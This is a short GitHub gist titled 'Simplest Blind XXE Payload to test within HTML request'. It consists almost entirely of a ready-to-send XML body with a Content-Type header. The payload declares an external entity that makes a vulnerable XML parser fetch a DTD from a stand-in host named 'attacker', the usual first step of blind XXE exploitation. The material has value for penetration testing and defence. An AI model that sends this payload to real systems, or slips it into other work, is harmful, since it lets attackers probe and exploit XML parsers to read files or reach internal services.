Skip to content

Instantly share code, notes, and snippets.

@mgeeky
Created April 25, 2017 11:35
  • Star 4 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save mgeeky/cf677de6e7fdc05803f6935de1ee0882 to your computer and use it in GitHub Desktop.
Simplest Blind XXE Payload to test within HTML request
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment